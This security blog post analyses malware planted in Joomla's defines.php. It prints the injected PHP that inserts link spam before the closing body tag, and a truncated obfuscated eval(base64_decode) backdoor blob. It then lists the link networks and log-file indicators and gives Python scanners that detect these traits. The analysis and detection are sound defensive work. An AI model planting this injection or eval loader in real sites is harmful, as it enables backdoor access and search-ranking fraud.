We found some interesting Joomla malware this week, where Joomla’s /includes/defines.php file had this code appended to it:

define('DZR', base64_decode('QzovaW5l[REDACTED]5waHA='));
if ( file_exists (DZR) ) {
    ob_start();
    require_once(DZR);
    ob_end_clean();
}
if ( !defined('RSLT') ) define('RSLT', '');

ob_start("callbck");
function callbck($buff_obs) {
    if ( defined('DZTR') ) return DZTR;
    if ( defined('NIND') ) {
        $buff_obs = ereg_replace("href=\"http", "href=\"_http", $buff_obs);
        $buff_obs = ereg_replace("href='http", "href='_http", $buff_obs);
        $buff_obs = ereg_replace("href=http", "href=_http", $buff_obs);
        $buff_obs = ereg_replace("_http://".NIND, "http://".NIND, $buff_obs);
    }
    return (ereg_replace("</body>", RSLT."\n</body>", $buff_obs));
}

The first line defines the constant “DZR” as “C:/inetpub/wwwroot/[REDACTED]/modules/mod_banners/tmpl/helper.php”. This was on a Windows server running multiple Joomla sites, and DZR pointed to a file helper.php within a different site. Several other sites on the server also had their defines.php infected with code pointing to this same helper.php.

The rest of the code runs helper.php (discarding anything it prints) and then registers an output-buffer callback that appends the contents of a constant called “RSLT” (result) just before the closing “</body>” tag of every page on the infected site. If helper.php also defines “NIND”, the callback first breaks every outbound http link on the page by prefixing it with an underscore and then restores only the links pointing at the NIND host. So what does helper.php do?
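The injected block has a handful of fixed traits (a path hidden in a base64_decode'd constant, a require_once wrapped in ob_start()/ob_end_clean(), a named output-buffer callback, and an ereg_replace on "</body>") that make it easy to spot with a static check over a site's PHP files. The scanner below is an added example for this post, not code from the original or from Joomla; the helper path and the infected/clean defines.php samples are constructed here, and the real base64 value from the incident is not reproduced.

```python
import base64
import re

# Constructed sample inputs (not real site data). The helper path below is a
# placeholder in the same shape as the redacted one from the post.
HELPER_PATH = "C:/inetpub/wwwroot/EXAMPLE-SITE/modules/mod_banners/tmpl/helper.php"
HELPER_B64 = base64.b64encode(HELPER_PATH.encode()).decode()

INFECTED_DEFINES = (
    "<?php\n"
    "define('JPATH_ROOT', dirname(__DIR__));\n"
    f"define('DZR', base64_decode('{HELPER_B64}'));\n"
    "if ( file_exists (DZR) ) { ob_start(); require_once(DZR); ob_end_clean(); }\n"
    "ob_start(\"callbck\"); function callbck($buff_obs) {\n"
    "  return (ereg_replace(\"</body>\", RSLT.\"\\n</body>\", $buff_obs)); }\n"
)
CLEAN_DEFINES = (
    "<?php\n"
    "define('JPATH_ROOT', dirname(__DIR__));\n"
    "define('JPATH_SITE', JPATH_ROOT);\n"
)

# Each indicator is one trait of the injected block shown in the post.
INDICATORS = {
    # define('NAME', base64_decode('...')) with the base64 payload captured
    "base64_path_constant": re.compile(
        r"define\s*\(\s*'[A-Z_]+'\s*,\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)"),
    # require_once(CONST) run inside an output buffer so nothing leaks to the page
    "require_inside_ob": re.compile(
        r"ob_start\s*\(\s*\)\s*;\s*require_once\s*\(\s*[A-Z_]+\s*\)"),
    # output buffering with a named callback that rewrites the whole response
    "ob_callback": re.compile(r'ob_start\s*\(\s*"[A-Za-z_][A-Za-z0-9_]*"\s*\)'),
    # content spliced in right before the closing body tag
    "body_injection": re.compile(r'ereg_replace\s*\(\s*"</body>"'),
}


def scan_php(source):
    """Report which indicators match and decode any base64 path constants."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(source)]
    decoded = []
    for b64 in INDICATORS["base64_path_constant"].findall(source):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable>")
    return {"indicators": matched, "decoded_paths": decoded}


def is_suspicious(report):
    # A lone base64 constant is common in clean code; require two traits together.
    return len(report["indicators"]) >= 2


if __name__ == "__main__":
    for label, src in (("infected", INFECTED_DEFINES), ("clean", CLEAN_DEFINES)):
        report = scan_php(src)
        print(label, "suspicious" if is_suspicious(report) else "clean", report)
```

Point scan_php at the contents of every includes/defines.php on a shared host; the decoded path tells you which other site's helper.php the infected copies share, which is the next file to pull for analysis.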

<?php
//Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar
$vd97cfe94a57="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($vd97cfe94a57(
"JHE1YTcyZTg3MzI0ZThhMjhlMTRkMzFhNDVjMDJjM2QwPSJceDYyIjskcjU1ZDNkOWMxZGU4ZTRkMDkxMGJlMWF
mMGZjZjU4ZjM9Ilx4NjUiOyRrODY0MzQwODBmMTAxZjhlNzg5MTAzMzI1NWM1YzM0ZD0iXHg2NiI7JHYwMTBlNGI
4Y2QxZTUyYzI3YTg4NjgxMDc4MmU3YzFkPSJceDY3IjskdTY1ZGI1YjNkMzJjMzI0Y2VmZmYwYzgwOTU3MmNjMGY
9Ilx4NmQiOyR0NjVjMWNiY[etc.]zXHgzN1w2NVx4NjNcNjFceDYzXDYwXHg2Mlw2MFx4MzFcNjFceDM1XDE0MVx4MzRcNjRceDY
0XDE0Nlx4MzJcNzAiKT8kdDY1YzFjYmE1Y2M5Y2M0YmU2OTBjNWUyZGM1OTllYzMoKTokdGEwY2E4ZDBmNGJiY2Y
0NTU4NDZhMWJkYzg1ODBjNjUoKTs="));
?>

We deobfuscated the code enough to find out.  It contains some basic backdoor code, but its main function is to check a bunch of variables and then display links obtained from one of the following Russian link-building networks:

  • linkfeed.ru
  • sape.ru
  • trustlink.ru
  • xap.ru
  • proflinks.net


It keeps track of what has been displayed via several log files, and it will contact external servers to obtain fresh links. It assembles code around the links (sometimes hidden with JavaScript setting the display property to “none”) and returns it to Joomla via the RSLT constant. It stores the log files in a temporary directory on the server, in this case “C:/tmp/tmp_server”. The files would have these names:

  • sess_fc.log
  • sess_fs.log
  • sess_nssp.log
  • sess_nslf.log
  • sess_nstl.log
  • sess_nsxp.log
  • sess_nspl.log
  • sess_fssp.log
  • sess_fslf.log
  • sess_fstl.log
  • sess_fsxp.log
  • sess_fspl.log
  • sess_tr.log
  • sess_(l|s|t|x|p)(32 hex characters)
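Because the log names share the sess_ prefix with PHP's own session files, a directory listing of the temp folder needs a precise match rather than a prefix check. The triage function below is an added example written for this post (not code from the original); the directory listing it runs over is constructed, and the match rules are exactly the thirteen fixed names plus the sess_(l|s|t|x|p) + 32 hex pattern listed above.

```python
import re

# The thirteen fixed log names from the post.
FIXED_LOGS = {
    "sess_fc.log", "sess_fs.log", "sess_nssp.log", "sess_nslf.log", "sess_nstl.log",
    "sess_nsxp.log", "sess_nspl.log", "sess_fssp.log", "sess_fslf.log", "sess_fstl.log",
    "sess_fsxp.log", "sess_fspl.log", "sess_tr.log",
}
# Per-network files: sess_ + one of l/s/t/x/p + 32 hex characters.
PER_NETWORK = re.compile(r"^sess_[lstxp][0-9a-fA-F]{32}$")

# Constructed 32-hex value used in the sample listing below.
HEX32 = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"

# Constructed listing of a temp directory: three fixed logs, one per-network
# log, one ordinary PHP session file (hex id, no letter prefix), one file whose
# prefix letter is outside the set, and an unrelated temp file.
SAMPLE_LISTING = [
    "sess_fc.log",
    "sess_nslf.log",
    "sess_tr.log",
    "sess_l" + HEX32,
    "sess_" + HEX32,
    "sess_q" + HEX32,
    "php1234.tmp",
]


def is_link_spam_artifact(name):
    """True only for names matching the malware's log-file naming scheme."""
    return name in FIXED_LOGS or PER_NETWORK.match(name) is not None


def triage_listing(names):
    """Split a directory listing into flagged artifacts and everything else.

    Note: a PHP session id produced with 5 bits per character can start with
    l/s/t/p, so treat a flagged per-network name as a lead to confirm by
    reading the file, not as proof on its own.
    """
    flagged = [n for n in names if is_link_spam_artifact(n)]
    ignored = [n for n in names if not is_link_spam_artifact(n)]
    return {"flagged": flagged, "ignored": ignored}


if __name__ == "__main__":
    result = triage_listing(SAMPLE_LISTING)
    for name in result["flagged"]:
        print("artifact:", name)
```

On a live host, feed os.listdir() of the temp directory (C:/tmp/tmp_server in this case) into triage_listing; the flagged files are worth preserving before cleanup, since they record which links were served and when.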


The links seem to be pretty standard spam – online pharmacies, online casinos, payday loans, etc. Though the link networks are Russian, the spam can be in English or potentially any language. The purpose of the links is to fraudulently boost the targets' search engine rankings by having a variety of sites link to them.

If you think your site is infected with this or any malicious code, you can always contact us and get help taking care of it.